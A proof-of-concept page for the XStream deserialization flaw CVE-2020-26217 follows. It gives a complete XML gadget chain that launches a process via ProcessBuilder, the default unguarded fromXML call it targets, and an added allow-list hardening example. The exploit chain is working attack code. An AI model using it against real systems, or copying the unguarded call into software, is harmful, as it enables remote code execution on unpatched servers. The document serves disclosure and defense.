2.18 KB / 2021-04-21 09:23:46

# (CVE-2020-26217) XStream XML Deserialization Remote Code Execution

Advisory: https://x-stream.github.io/CVE-2020-26217.html

```xml
<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
        <dataHandler>
          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
            <contentType>text/plain</contentType>
            <is class='java.io.SequenceInputStream'>
              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
                <iterator class='javax.imageio.spi.FilterIterator'>
                  <iter class='java.util.ArrayList$Itr'>
                    <cursor>0</cursor>
                    <lastRet>-1</lastRet>
                    <expectedModCount>1</expectedModCount>
                    <outer-class>
                      <java.lang.ProcessBuilder>
                        <command>
                          <string>calc</string>
                        </command>
                      </java.lang.ProcessBuilder>
                    </outer-class>
                  </iter>
                  <filter class='javax.imageio.ImageIO$ContainsFilter'>
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>start</name>
                  </filter>
                  <next/>
                </iterator>
                <type>KEYS</type>
              </e>
              <in class='java.io.ByteArrayInputStream'>
                <buf></buf>
                <pos>0</pos>
                <mark>0</mark>
                <count>0</count>
              </in>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <string>test</string>
  </entry>
</map>
```
    
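```java
import com.thoughtworks.xstream.XStream;
// `xml` holds the document above; a default XStream instance unmarshals it with no type allow-list
XStream xstream = new XStream();
xstream.fromXML(xml);
```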
    
    ![image-20201117135642244](resource/(CVE-2020-26217)/media/image-20201117135642244.png)
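
The hardened counterpart of the two-line call above, as an added example that is not part of the original page or of the XStream project's own code: the instance starts from deny-all and allows only the types the application expects, so a document naming any other class is rejected when its type is resolved. It assumes the XStream library is on the classpath and that the application expects a map of strings; the class name `XStreamAllowListDemo`, the methods `hardened` and `accepts`, and both sample documents are constructed for illustration.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.XStreamException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;
import java.util.Map;

public class XStreamAllowListDemo {

    // Build an XStream instance that unmarshals only the types the application expects.
    static XStream hardened() {
        XStream xstream = new XStream();
        xstream.addPermission(NoTypePermission.NONE);              // start from deny-all
        xstream.addPermission(NullPermission.NULL);                // allow null values
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES); // allow primitives and their wrappers
        xstream.allowTypeHierarchy(Map.class);                     // assumption: the app expects a map...
        xstream.allowTypes(new Class[] {String.class});            // ...whose keys and values are strings
        return xstream;
    }

    // Returns true if the document was unmarshalled, false if XStream refused it.
    static boolean accepts(XStream xstream, String xml) {
        try {
            xstream.fromXML(xml);
            return true;
        } catch (XStreamException e) {
            // Forbidden or unresolvable types surface as XStreamException subclasses.
            System.out.println("rejected: " + e.getClass().getName());
            return false;
        }
    }

    public static void main(String[] args) {
        // Constructed sample: the shape the application expects.
        String expected = "<map><entry><string>k</string><string>v</string></entry></map>";
        // Constructed sample: same outer shape, but the key names a type outside the allow-list
        // (only the outermost element of the document above, with no nested content).
        String unexpected = "<map><entry><jdk.nashorn.internal.objects.NativeString>"
                + "<flags>0</flags></jdk.nashorn.internal.objects.NativeString>"
                + "<string>test</string></entry></map>";

        XStream xstream = hardened();
        System.out.println("expected document accepted:   " + accepts(xstream, expected));
        System.out.println("unexpected document accepted: " + accepts(xstream, unexpected));
    }
}
```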
    